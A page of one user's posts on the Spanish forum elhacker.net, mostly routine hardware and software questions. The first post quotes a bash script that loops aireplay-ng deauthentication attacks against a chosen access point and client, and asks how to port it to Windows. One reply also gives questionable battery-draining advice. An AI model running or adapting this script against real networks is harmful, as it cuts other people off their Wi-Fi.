elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1] 2 3
1  Programación / Scripting / DUDA script .sh a .vbs en: 10 Febrero 2016, 16:50 pm
Buenas compañeros, creo que este tema debe ir en este apartado ya que como finalidad quiero crear un script en VBS.

Soy usuario de windows y me gustaría portar un script .sh a .vbs para trabajar con comodidad desde windows, no sé si esto será posible pero si alguien más experto puede ayudarme a portarlo o indicarme como hacerlo estaría profundamente agradecido.

El script es el siguiente:

Citar
echo -n -e ‘\E[37;41m'”Enter Interface: “; tput sgr0
read int
echo ‘—>’
echo -n -e ‘\E[37;41m'”Enter Target AP Bssid: “; tput sgr0
read bsid
echo ‘—>’
echo -n -e ‘\E[37;41m'”Enter Target AP channel: “; tput sgr0
read chn
iwconfig $int channel $chn
echo ‘—>’
echo -n -e ‘\E[37;41m'”Enter Target Connected Client: “; tput sgr0
read cli
echo ‘—>’
rm /home/cut.sh &>/dev/null;
echo ”’for (( ; ; ))
do
  aireplay-ng -a ‘$bsid’ -c ‘$cli’ -0 100 ‘$int’
  
done
”’ >> /home/cut.sh
xterm -geometry 70×12-1-1 -T “killing progress” -bg red -e “sh /home/cut.sh”
ACLARO antes de nada que entiendo que tiene rutas y software exclusivo de linux, pero, ¿seria posible realizar algo similar en un entorno windows?
Espero sus respuestas.
2  Foros Generales / Foro Libre / Re: ¿Qué son estos misteriosos rectángulos en YouTube? en: 9 Abril 2015, 23:13 pm
Investigando... resultan ser pruebas aleatorias de graficos para una empresa suiza,hay fotos y todo, aunque por lo que a mi me parece... es mas un experimento social que otra cosa debido a que Google se ha metido de lleno en el asunto dando informacion relevante.
3  Sistemas Operativos / Windows / Ayuda: ¿Cómo actualizar mi BIOS? en: 16 Marzo 2015, 12:30 pm
Buenos dias, no sé si este post debe ir aqui (si no es así pido que lo ubiquen correctamente).

Mi Bios está empezando a darme problemas, debo reconocer que ya es vieja (2007) y necesito actualizarla para entre otras cosas bootear desde un USB (la otra razón es que al iniciar el pc me salta una ventana de American Megatrends pidiendome que pulse F2 para continuar, supongo que estará dañada)

He probado mil y una formas para intentar actualizarla pero en la página oficial no aclaran nada, solo un software para "flashear" pero no encuentro ninguna ROM para poder usar en el mismo.

Si sirve de algo... dejo el reporte de Everest sobre mi bios, si es necesario  me lo decís y dejo el de la placa base completa.  

Espero que alguien pueda ayudarme porque me está dando muchos quebraderos de cabeza.

Pd: Añado que es una AMI BIOS de un HP Pavilion a6119.es, es todo lo que sé.

Pd 2: Este es el enlace del software para "flashear": https://www.ami.com/download-license-agreement/?DownloadFile=AMIBIOS_and_Aptio_AMI_Firmware_Update_Utility.zip , también he probado en soporte y nada... no hay manera de encontrar algo útil.

4  Foros Generales / Dudas Generales / Re: ¿Es posible extraer un email de un perfil web? en: 2 Febrero 2015, 18:37 pm
Y si pruebas a cifrar un texto mediante algun algoritmo?

Seria tan simple como escribirlo y que ella misma lo desencripte.

Pd: quizás suene a pelicula de ciencia ficcion pero es lo más simple que se me ocurre
5  Informática / Hardware / Re: Tarjeta Gráfica externa (eGPU) a través de USB 3.0 ¿Posible? en: 2 Febrero 2015, 18:35 pm
La velocidad de transferencia tiene que ver, pero dudo que una tarjeta gráfica por muy potente que sea, transfiera semejante cantidad de datos para que un USB 3.0 no sea capaz de soportarlo  :rolleyes:

Bajo mi punto de vista no habría problemas a la hora de la funcionalidad, puesto que la velocidad de transferencia de ambas conexiones es muy alta.El problema seria encontrar un adaptador. No me extrañaría que hubiese alguna eGPU por usb (creo haberlas visto en algún sitio)

Y respecto al tema de la compatibilidad con portátiles, suponiendo que tengas unos drivers y una conexión mPCIe al menos, debería de funcionar.

Espero haberte aclarado las dudas, y ahora me pica la curiosidad porque hace unos años busqué algo parecido aunque por aquella época no me imaginaba algo asi jeje
6  Informática / Hardware / Re: bateria me apaga la laptop en: 2 Febrero 2015, 18:19 pm
Prueba a hacerle un reset de memoria a la bateria ( al igual que los teléfonos)

1:Deja que se agote, aguántala 12 horas sin cargar.

2:La cargas durante 8 horas, y la gastas completamente sin parar.

3:Vuelves a dejarla 8 horas sin cargar.

4:Ya si que la cargas y puedes hacer uso normal.

A ver si el rendimiento mejora. Un saludo.
7  Media / Juegos y Consolas / Re: Minecraft 50 FPS con bajones de hasta 0 FPS 1 segundo en: 2 Febrero 2015, 18:16 pm
Dudo que sea problema de la tarjeta gráfica, de todos modos prueba a instalar una version más antigua si es que la has actualizado cuando formateaste (con una o dos revisiones por debajo seria suficiente para ver si mejora el rendimiento).

Otra opción puede ser que el ordenador no refrigere bien, si es asi, hay multitud de software que puede aumentar el rendimiento de los ventiladores al igual que otro software como gamebooster que permite cerrar todos los procesos excepto los del juego.
8  Media / Multimedia / Re: descargar video de un reproductor en: 2 Febrero 2015, 18:11 pm
Creo que esto te puede ayudar:

http://www.enlanubetic.com.es/2013/03/streamtransport.html

La descarga la tienes aqui:

http://dfiles.eu/files/nrnf92kpk

Es un freeware asi que no te preocupes.
9  Foros Generales / Dudas Generales / Re: ¿Es posible extraer un email de un perfil web? en: 2 Febrero 2015, 18:01 pm
Podrias probar con otra cosa que no fuese información personal (webs,enlaces,numeros,etc)

¿Has probado con algún idioma con carácteres extraños o poco conocido?

Más o menos, vendría a ser asi...:

Mensaje:TRADUCE (y lo que quieras poner en un idioma poco conocido, en África hay muchas lenguas poco conocidas y google traductor te hace el apaño...)

En vez de poner @ prueba con: "en(@) hot(hotmail) com"

Si no es un bot te entenderá  ;D

Todo es probar amigo, hay miles de soluciones para un solo problema y a veces no hay que saber de programación ni de hacking avanzado para ello.

Suerte en tu búsqueda.
10  Comunicaciones / Redes / Re: Misma MAC, misma IP en: 2 Febrero 2015, 17:49 pm
No deberías conectar a un mismo router dos MAC iguales puesto que:

A) O cada uno de ellos recibe paquetes incompletos.

o

B) Uno de ellos recibe los paquetes y el otro no (probablemente esto nunca llegue a ocurrir, es un suponer xD)

Pd: Dándole vueltas a lo que preguntas, quizás pretendes hacer "algo" y con un solo ordenador no puedas, de ahi que necesites dos pc's con MAC idénticas.

Prueba con una maquina virtual si lo que necesitas son dos entornos de windows, si mal no recuerdo la propia maquina permite el acceso a internet con una MAC falsa o la propia del pc. Seria interesante investigar si es posible lograr algo asi...

Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines